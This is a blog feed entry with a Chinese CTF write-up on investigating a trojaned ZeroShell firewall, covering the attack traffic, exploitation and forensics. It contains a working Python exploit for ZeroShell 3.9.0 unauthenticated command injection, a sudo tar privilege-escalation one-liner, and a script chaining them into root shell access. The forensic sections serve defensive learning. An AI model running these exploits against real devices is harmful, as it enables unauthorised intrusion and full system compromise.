{
    "version": "https://jsonfeed.org/version/1",
    "title": "K1T0 • All posts by \"安全运营\" category",
    "description": "一点小分享",
    "home_page_url": "https://k1t0111.github.io",
    "items": [
        {
            "id": "https://k1t0111.github.io/2024/12/26/%E5%A4%96%E8%81%94%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90-ciscn/",
            "url": "https://k1t0111.github.io/2024/12/26/%E5%A4%96%E8%81%94%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90-ciscn/",
            "title": "外联木马分析-ciscn",
            "date_published": "2024-12-26T09:50:15.000Z",
            "content_html": "<p><a href=\"https://github.com/CTF-Archives/2024-ccbciscn\">https://github.com/CTF-Archives/2024-ccbciscn</a><br />\n<a href=\"https://bili33.top/posts/CTF-CISCN2024-Preliminary-round-Writeup/\">https://bili33.top/posts/CTF-CISCN2024-Preliminary-round-Writeup/</a></p>\n<p>靶机来自 2024 年长城杯 ciscn ，个人比较感兴趣，因此继续做一遍</p>\n<p>小路是一名实习生，接替公司前任网管的工作，一天发现公司网络出口出现了异常的通信，现需要通过回溯出口流量对异常点位 (防火墙) 进行定位，并确定异常的设备。然后进行深度取证检查（需要获取 root 权限）。现在需要你从网络攻击数据包中找出漏洞攻击的会话，分析会话编写 exp 或数据包重放获取防火墙设备管理员权限，查找防火墙设备上安装的木马，然后分析木马外联地址和通信密钥以及木马启动项位置。</p>\n<h4 id=\"1-zeroshell\"><a class=\"anchor\" href=\"#1-zeroshell\">#</a> 1 zeroshell</h4>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226115950.png\" alt=\"image.png\" /></p>\n<p>背景就是一台防火墙设备存在相关 rce 漏洞，因此被注入了相关外联木马。</p>\n<h5 id=\"11-攻击流量\"><a class=\"anchor\" href=\"#11-攻击流量\">#</a> 1.1 攻击流量</h5>\n<p>其实就是利用了自带的后门进行命令执行。然后分析流量明文找到 flag<br />\n<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226132002.png\" alt=\"image.png\" /></p>\n<p>因此我们仿照着攻击路径，针对防火墙进行攻击，拿到对应的权限</p>\n<h5 id=\"12-rce\"><a class=\"anchor\" href=\"#12-rce\">#</a> 1.2   rce</h5>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">import</span> requests</pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token keyword\">import</span> optparse</pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token keyword\">import</span> time</pre></td></tr><tr><td data-num=\"4\"></td><td><pre></pre></td></tr><tr><td data-num=\"5\"></td><td><pre>parser <span class=\"token operator\">=</span> optparse<span class=\"token punctuation\">.</span>OptionParser<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"6\"></td><td><pre>parser<span class=\"token punctuation\">.</span>add_option<span class=\"token punctuation\">(</span><span class=\"token string\">'-u'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'--url'</span><span class=\"token punctuation\">,</span> action<span class=\"token operator\">=</span><span class=\"token string\">\"store\"</span><span class=\"token punctuation\">,</span> dest<span class=\"token operator\">=</span><span class=\"token string\">\"url\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">help</span><span class=\"token operator\">=</span><span class=\"token string\">'Base target uri (ex. http://target-uri/)'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"7\"></td><td><pre></pre></td></tr><tr><td data-num=\"8\"></td><td><pre>options<span class=\"token punctuation\">,</span> args <span class=\"token operator\">=</span> parser<span class=\"token punctuation\">.</span>parse_args<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre><span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> options<span class=\"token punctuation\">.</span>url<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre>    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] Specify an url target'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"11\"></td><td><pre>    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] Example usage: exploit.py -u http://target-uri/'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"12\"></td><td><pre>    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] Example help usage: exploit.py -h'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre>    exit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"14\"></td><td><pre></pre></td></tr><tr><td data-num=\"15\"></td><td><pre>uri_zeroshell <span class=\"token operator\">=</span> options<span class=\"token punctuation\">.</span>url</pre></td></tr><tr><td data-num=\"16\"></td><td><pre>session <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>Session<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"17\"></td><td><pre></pre></td></tr><tr><td data-num=\"18\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">command</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"19\"></td><td><pre>\t<span class=\"token comment\">#  进行一个漏洞是否存在的探测</span></pre></td></tr><tr><td data-num=\"20\"></td><td><pre>    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"21\"></td><td><pre>        check <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>uri_zeroshell <span class=\"token operator\">+</span> <span class=\"token string\">\"/cgi-bin/kerbynet?Action=x509view&amp;Section=NoAuthREQ&amp;User=&amp;x509type='%0Aid%0A'\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"22\"></td><td><pre>        <span class=\"token keyword\">if</span> check<span class=\"token punctuation\">.</span>status_code <span class=\"token operator\">==</span> <span class=\"token number\">200</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"23\"></td><td><pre>            flag <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span></pre></td></tr><tr><td data-num=\"24\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] ZeroShell 3.9.0 Remote Command Execution'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"25\"></td><td><pre>            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"26\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] Success connect to target'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"27\"></td><td><pre>            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"28\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[+] Trying to execute command in ZeroShell OS...\\n'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"29\"></td><td><pre>            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"30\"></td><td><pre>            check<span class=\"token punctuation\">.</span>raise_for_status<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>  </pre></td></tr><tr><td data-num=\"31\"></td><td><pre></pre></td></tr><tr><td data-num=\"32\"></td><td><pre>        <span class=\"token keyword\">while</span> flag<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"33\"></td><td><pre>            cmd <span class=\"token operator\">=</span> <span class=\"token builtin\">raw_input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"$ \"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"34\"></td><td><pre>            <span class=\"token comment\"># 不停输入命令 进行命令注入点命令执行 </span></pre></td></tr><tr><td data-num=\"35\"></td><td><pre>            payload <span class=\"token operator\">=</span> <span class=\"token string\">\"/cgi-bin/kerbynet?Action=x509view&amp;Section=NoAuthREQ&amp;User=&amp;x509type='%0A\"</span> <span class=\"token operator\">+</span> cmd <span class=\"token operator\">+</span> <span class=\"token string\">\"%0A'\"</span></pre></td></tr><tr><td data-num=\"36\"></td><td><pre>            uri_vuln <span class=\"token operator\">=</span> uri_zeroshell <span class=\"token operator\">+</span> payload</pre></td></tr><tr><td data-num=\"37\"></td><td><pre>            burp0_headers <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span><span class=\"token string\">\"User-Agent\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Accept\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Accept-Language\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"en-US,en;q=0.5\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Accept-Encoding\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"gzip, deflate\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Connection\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"close\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Upgrade-Insecure-Requests\"</span><span class=\"token punctuation\">:</span> <span class=\"token string\">\"1\"</span><span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"38\"></td><td><pre>            res <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>uri_vuln<span class=\"token punctuation\">,</span> headers<span class=\"token operator\">=</span>burp0_headers<span class=\"token punctuation\">,</span> verify<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"39\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>res<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span>res<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">.</span>rindex<span class=\"token punctuation\">(</span><span class=\"token string\">\"&lt;html>\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"40\"></td><td><pre></pre></td></tr><tr><td data-num=\"41\"></td><td><pre>    <span class=\"token keyword\">except</span> requests<span class=\"token punctuation\">.</span>exceptions<span class=\"token punctuation\">.</span>ConnectionError <span class=\"token keyword\">as</span> err<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"42\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[x] Failed to Connect in: '</span><span class=\"token operator\">+</span>uri_zeroshell<span class=\"token operator\">+</span><span class=\"token string\">' '</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"43\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[x] This host seems to be Down'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"44\"></td><td><pre>        exit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"45\"></td><td><pre>    <span class=\"token keyword\">except</span> requests<span class=\"token punctuation\">.</span>exceptions<span class=\"token punctuation\">.</span>HTTPError <span class=\"token keyword\">as</span> conn<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"46\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[x] Failed to execute command in: '</span><span class=\"token operator\">+</span>uri_zeroshell<span class=\"token operator\">+</span><span class=\"token string\">' '</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"47\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">'[x] This host does not appear to be a ZeroShell'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"48\"></td><td><pre>        exit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"49\"></td><td><pre></pre></td></tr><tr><td data-num=\"50\"></td><td><pre>command<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr></table></figure><p>提取 payload 其实就是一个 url 访问<br />\n /cgi-bin/kerbynet?Action=x509view&amp;Section=NoAuthREQ&amp;User=&amp;x509type='%0Asudo -l%0A'<br />\n 并且还有一个提权可以从 apache 提权到 root</p>\n<figure class=\"highlight shell\"><figcaption data-lang=\"Bash\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre>/etc/sudo <span class=\"token function\">tar</span> <span class=\"token parameter variable\">-cf</span> /dev/null /dev/null <span class=\"token parameter variable\">--checkpoint</span><span class=\"token operator\">=</span><span class=\"token number\">1</span> --checkpoint-action<span class=\"token operator\">=</span>exec<span class=\"token operator\">=</span>id</pre></td></tr></table></figure><p>利用这个提权语句拿到 root 权限<br />\n<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226122256.png\" alt=\"image.png\" /></p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226122351.png\" alt=\"image.png\" /></p>\n<p>由于一些上马的操作无法完成，我自己写了一个提权执行命令脚本</p>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">import</span> requests</pre></td></tr><tr><td data-num=\"2\"></td><td><pre></pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token comment\"># cmd 执行相关提权命令</span></pre></td></tr><tr><td data-num=\"4\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">cmd</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"5\"></td><td><pre>    Url<span class=\"token operator\">=</span><span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[+]Input Url\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"6\"></td><td><pre>    payload1<span class=\"token operator\">=</span><span class=\"token string\">\"/cgi-bin/kerbynet?Action=x509view&amp;Section=NoAuthREQ&amp;User=&amp;x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=\"</span></pre></td></tr><tr><td data-num=\"7\"></td><td><pre>    payload2<span class=\"token operator\">=</span><span class=\"token string\">\"%0A'\"</span></pre></td></tr><tr><td data-num=\"8\"></td><td><pre>    <span class=\"token keyword\">while</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre>        cmd1<span class=\"token operator\">=</span><span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"cmd$:\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre>        payload<span class=\"token operator\">=</span>Url<span class=\"token operator\">+</span>payload1<span class=\"token operator\">+</span><span class=\"token string\">\"\\\"\"</span><span class=\"token operator\">+</span>cmd1<span class=\"token operator\">+</span><span class=\"token string\">\"\\\"\"</span><span class=\"token operator\">+</span>payload2</pre></td></tr><tr><td data-num=\"11\"></td><td><pre>        res<span class=\"token operator\">=</span>requests<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"12\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>res<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">:</span>res<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">.</span>index<span class=\"token punctuation\">(</span><span class=\"token string\">\"&lt;html>\"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">//</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre></pre></td></tr><tr><td data-num=\"14\"></td><td><pre><span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"15\"></td><td><pre>    cmd<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr></table></figure><p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226125849.png\" alt=\"image.png\" /></p>\n<h5 id=\"13-外联地址\"><a class=\"anchor\" href=\"#13-外联地址\">#</a> 1.3  外联地址</h5>\n<p>找出受控机防火墙设备中驻留木马的外联域名或 IP 地址，结果提交形式：flag {xxxx}，如 flag {<a href=\"http://www.abc.com/\">www.abc.com</a>}</p>\n<p>我们可以看一下我们的进程的连接情况，端口开放情况。相对应的就有可能外联驻留木马的一些痕迹。</p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226134917.png\" alt=\"image.png\" /></p>\n<h5 id=\"14-木马位置\"><a class=\"anchor\" href=\"#14-木马位置\">#</a> 1.4 木马位置</h5>\n<p>请写出木马进程执行的本体文件的名称，结果提交形式：flag {xxxxx}，仅写文件名不加路径</p>\n<p>这个属实是没写出来，我的想法是利用 ip 找到对应进程的 pid 但是很抽象。</p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226160921.png\" alt=\"image.png\" /></p>\n<p>我们无法发现对应的 pid 因为连接已经断掉了。因此只能去取证分析因为有内存和磁盘<br />\n我们利用 Diskgenius 挂载。</p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226164355.png\" alt=\"image.png\" /><br />\n 目前已经知道外联木马的外部 ip 地址。查看磁盘中的文件关联。直接根据外联的 ip 去搜索对应的文件</p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226172447.png\" alt=\"image.png\" /></p>\n<p>可以看到直接其实就是 nginx</p>\n<h5 id=\"15-木马通信密钥\"><a class=\"anchor\" href=\"#15-木马通信密钥\">#</a> 1.5 木马通信密钥</h5>\n<p>ida 分析 nginx  怎么说呢这我也不会。 直接分析吧。搜素对应的公网 ip 总能看到一些东西</p>\n<p><img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226174227.png\" alt=\"image.png\" /></p>\n<h5 id=\"16-木马启动项\"><a class=\"anchor\" href=\"#16-木马启动项\">#</a> 1.6  木马启动项</h5>\n<p>直接搜索木马名字看看谁内部包含<br />\n<img loading=\"lazy\" data-src=\"https://raw.githubusercontent.com/k1t0111/blog/main/image/20241226174513.png\" alt=\"image.png\" /><br />\n 找到启动项</p>\n",
            "tags": [
                "应急响应"
            ]
        }
    ]
}